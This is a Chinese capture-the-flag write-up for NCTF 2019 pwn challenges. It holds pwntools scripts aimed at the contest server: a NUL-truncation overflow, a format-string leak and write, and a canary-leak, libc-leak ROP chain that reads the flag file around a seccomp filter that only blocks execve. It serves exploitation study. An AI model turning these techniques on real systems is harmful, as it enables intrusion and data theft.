Nctf2019 pwn
没啥好说的自己菜
就做了三个
hello_pwn
没啥好说了直接连
from pwn import *
local=1  # set but never read here; presumably a local/remote switch the author did not wire up
p=remote('139.129.76.65',50003)  # connect to the contest service for this level
p.interactive()  # hand the connection to the user; per the write-up, connecting is all this level needs
pwn me 100 years! (Ⅰ)
00截断，然后直接覆盖
from pwn import *
p=remote('139.129.76.65',50004)
#p=process('./pwn_me_1')
# Build a 0x10-byte field: "yes" followed by NUL padding (the "00 truncation" the
# write-up refers to), then four more bytes after the field. Presumably a C-string
# compare stops at the first NUL and the trailing bytes land past the field; the
# defensive fix is to bound the copy to the field size and check the full length.
payload='yes'.ljust(0x10,'\x00')
payload+='ffff'
p.sendline(payload)
p.interactive()
pwn me 100 years! (Ⅱ)
这道题我为啥写入不了，还是姿势不对啊，大师傅们教教我
from pwn import *
p=process('./pwn_me_2')
elf=ELF('./pwn_me_2')
offset=6  # not used below; the hard-coded '%10$n' carries the argument index instead
p.recvuntil('name:')
# Format-string read: if the name is handed to printf as the format itself, each %p
# prints one stack word. A fixed format (printf("%s", name)) removes both this leak
# and the %n write further down.
p.send('%p'*24)
# Take the 14 characters ending in 'd30' from the leaked output, parse as hex and strip
# the 0xd30 low bits; presumably this is the PIE base — TODO confirm against the binary.
base=int(p.recvuntil('d30')[-14:],16)-0xd30
flag_addr=base+0x2020E0  # base-relative address the write-up wants to modify
log.success('base: '+hex(base))
log.success('flag_addr: '+hex(flag_addr))
p.recvuntil('want?')
# Format-string write (%n) aimed at flag_addr. The author reports this write did not
# take effect and the write-up leaves it unresolved; no further analysis is added here.
payload='111111'+'%'+str(0x3333332D)+'c'+'%'+str(0x33333333)+'c%10$n'+p64(flag_addr)
p.send(payload)
p.interactive()
print payload  # Python 2 print statement; only reached after interactive() returns
pwn me 100 years! (Ⅲ)
收集wp中自己太菜…
warmup
开了沙箱过滤了execve直接读呗…
from pwn import *
from LibcSearcher import *
local=0  # 0 = contest service, 1 = local binary with the matching libc build
if local==1:
    p=process('./warm_up')
    elf=ELF('./warm_up')
    libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
else:
    p=remote('139.129.76.65',50007)
    elf=ELF('./warm_up')
    libc=ELF('./libc-2.23.so')
# Fixed addresses inside the binary (presumably not PIE, given the constant 0x40xxxx
# values); taken from the write-up as-is and only valid for this exact build.
pop_rdi=0x000400bc3
pop_rsi_r15=0x000400bc1
flag_addr=0x6010b0  # writable buffer in the binary, used below to stage the filename and the file contents
def su(address):
    """Log an address as a pwntools success line. Defined but not called by exp()."""
    log.success('address :'+hex(address))
def exp():
    """Run the warm_up solution: leak the canary and a libc pointer, then ROP to print the flag file.

    Stage 1 -- canary leak: the 0x18-byte input is echoed back together with the bytes
    after it, so the canary is recovered from the echo. Defensive note: an echo must be
    bounded by the input length, never by a fixed buffer size.
    Stage 2 -- libc leak: overwrite the return address to call puts(puts@got) through the
    PLT, then return into 0x00400AB6 (presumably re-enters the input routine).
    Stage 3 -- read/open/read/write chain on flag_addr. Plain file syscalls are used
    because, per the write-up, the sandbox only filters execve. Defensive note: a seccomp
    policy should be an allow-list of needed syscalls, not a block-list of one.

    Uses the module-level p, elf, libc, pop_rdi, pop_rsi_r15 and flag_addr.
    """
    p.recvuntil('!!!')
    p.sendline(0x18*'a')  # fills the 0x18-byte buffer; the trailing '\n' presumably clobbers the canary's low NUL so the echo runs on
    p.recvuntil('aaaaa\n')
    canary=u64(p.recv(7).rjust(8,'\x00'))  # 7 echoed bytes, low 0x00 byte restored
    log.success('canary: '+hex(canary))
    # Round 1: pad, intact canary, saved rbp, then puts(puts@got) and a return to 0x00400AB6.
    pd='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x00400AB6)
    p.recvuntil(' ?')
    p.sendline(pd)
    put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))  # 6-byte little-endian pointer ending in 0x7f
    log.success('put_addr: '+hex(put_addr))
    libcbase=put_addr-libc.symbols['puts']
    # The offsets below are hard-coded for the 2.23 libc loaded above and break on any other build.
    open_addr=libcbase+0x0F7049
    log.success('open_addr: '+hex(open_addr))
    write_addr=libcbase+0x00F72B0
    read_addr=libcbase+0x0F7250
    pop_rdx=libcbase+0x00001b92
    pop_rsi=libcbase+0x0202e8
    p.recvuntil('!!!')
    p.sendline('binbin')
    # Round 2 chain:
    #   rdi=0, rsi=flag_addr (r15=0x8 is only filler; rdx is not set here) -> read via the binary's own symbol
    payload='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(flag_addr)+p64(0x8)+p64(elf.symbols['read'])
    #   rdi=flag_addr, rsi=0 -> open; then rdi=3 (assumes the opened file lands on fd 3)
    payload+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open_addr)+p64(pop_rdi)+p64(3)
    #   rsi=flag_addr, rdx=0x100 -> read; then rdi=1, rsi=flag_addr
    payload+=p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(read_addr)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)
    #   rdx=0x100 -> write to stdout
    payload+=p64(pop_rdx)+p64(0x100)+p64(write_addr)
    p.recvuntil(' ?')
    p.send(payload)
    sleep(1)  # let the chain reach its first read() before the filename is sent
    p.send('flag')  # filename consumed by that read() into flag_addr
    p.send('\n')
    p.interactive()
# Script entry point: run the solution only when executed directly, not on import.
if __name__=="__main__":
    exp()
后面的easy_rop,easy_heap没看了